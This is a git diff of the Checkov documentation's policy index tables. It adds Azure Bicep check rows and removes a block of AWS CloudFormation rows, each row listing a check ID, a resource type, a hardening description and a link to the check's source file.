+| 173 | CKV_AZURE_212 | resource | Microsoft.Web/sites | Ensure App Service has a minimum number of instances for failover | Bicep | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) |
+| 174 | CKV_AZURE_212 | resource | Microsoft.Web/sites/slots | Ensure App Service has a minimum number of instances for failover | Bicep | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) |
+| 175 | CKV_AZURE_213 | resource | Microsoft.Web/sites | Ensure that App Service configures health check | Bicep | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) |
+| 176 | CKV_AZURE_213 | resource | Microsoft.Web/sites/slots | Ensure that App Service configures health check | Bicep | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) |
+| 177 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) |
+| 178 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | Bicep | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) |
+| 179 | CKV_AZURE_222 | resource | Microsoft.Web/sites | Ensure that Azure Web App public network access is disabled | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) |
+| 180 | CKV_AZURE_222 | resource | Microsoft.Web/sites/config | Ensure that Azure Web App public network access is disabled | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) |
+| 181 | CKV_AZURE_222 | resource | Microsoft.Web/sites/slots | Ensure that Azure Web App public network access is disabled | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) |
+| 182 | CKV_AZURE_223 | resource | Microsoft.EventHub/namespaces | Ensure Event Hub Namespace uses at least TLS 1.2 | Bicep | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py) |
+| 183 | CKV_AZURE_225 | resource | Microsoft.Web/serverfarms | Ensure the App Service Plan is zone redundant | Bicep | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py) |
+| 184 | CKV_AZURE_226 | resource | Microsoft.ContainerService/managedClusters | Ensure ephemeral disks are used for OS disks | Bicep | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py) |
+| 185 | CKV_AZURE_227 | resource | Microsoft.ContainerService/managedClusters | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Bicep | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) |
+| 186 | CKV_AZURE_227 | resource | Microsoft.ContainerService/managedClusters/agentPools | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Bicep | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) |
+| 187 | CKV_AZURE_229 | resource | Microsoft.Sql/servers/databases | Ensure the Azure SQL Database Namespace is zone redundant | Bicep | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py) |
+| 188 | CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries | Ensure Azure Container Registry (ACR) is zone redundant | Bicep | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) |
+| 189 | CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries/replications | Ensure Azure Container Registry (ACR) is zone redundant | Bicep | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) |
+| 190 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable local authentication | Bicep | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) |
+| 191 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that all Azure Cognitive Services accounts are configured with a managed identity | Bicep | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) |
+| 192 | CKV_AZURE_239 | resource | Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace administrator login password is not exposed | Bicep | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py) |
+| 193 | CKV_AZURE_240 | resource | Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace is encrypted with a CMK | Bicep | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py) |
+| 194 | CKV_AZURE_242 | resource | Microsoft.Synapse/workspaces/bigDataPools | Ensure isolated compute is enabled for Synapse Spark pools | Bicep | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py) |
+| 195 | CKV_AZURE_243 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is configured with private endpoint | Bicep | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) |
+| 196 | CKV2_AZURE_19 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Bicep | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py) |
+| 197 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) |
+| 198 | CKV2_AZURE_46 | resource | Microsoft.Synapse/workspaces/vulnerabilityAssessments | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Bicep | [AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py) |
+| 199 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Bicep | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) |
 ---
diff --git a/docs/5.Policy Index/cloudformation.md b/docs/5.Policy Index/cloudformation.md
index 8c19c436756..36ea47a60a5 100644
--- a/docs/5.Policy Index/cloudformation.md
+++ b/docs/5.Policy Index/cloudformation.md
@@ -78,104 +78,118 @@ nav_order: 1
| 67 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) |
| 68 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) |
| 69 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) |
-| 70 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) |
-| 71 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) |
-| 72 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) |
-| 73 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | 
[ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) |
-| 74 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) |
-| 75 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) |
-| 76 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) |
-| 77 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) |
-| 78 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. 
| Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) |
-| 79 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) |
-| 80 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) |
-| 81 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) |
-| 82 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) |
-| 83 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) |
-| 84 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) |
-| 85 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | 
[APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) |
-| 86 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) |
-| 87 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) |
-| 88 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) |
-| 89 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) |
-| 90 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) |
-| 91 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) |
-| 92 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure 
DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) |
-| 93 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) |
-| 94 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
-| 95 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
-| 96 | CKV_AWS_107 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
-| 97 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
-| 98 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) |
-| 99 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
-| 100 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
-| 101 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
-| 102 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
-| 103 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) |
-| 104 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
-| 105 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
-| 106 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | 
[IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
-| 107 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
-| 108 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) |
-| 109 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 110 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 111 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 112 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 113 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 114 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 115 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 116 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 117 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 118 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) |
-| 119 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
-| 120 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for 
function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) |
-| 121 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
-| 122 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) |
-| 123 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
-| 124 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) |
-| 125 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) |
-| 126 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) |
-| 127 | CKV_AWS_120 
| resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
-| 128 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) |
-| 129 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) |
-| 130 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) |
-| 131 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) |
-| 132 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) |
-| 133 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
-| 134 | CKV_AWS_155 | resource 
| AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
-| 135 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
-| 136 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) |
-| 137 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
-| 138 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
-| 139 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) |
-| 140 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) |
-| 141 | CKV_AWS_163 | resource | 
AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) |
-| 142 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) |
-| 143 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) |
-| 144 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) |
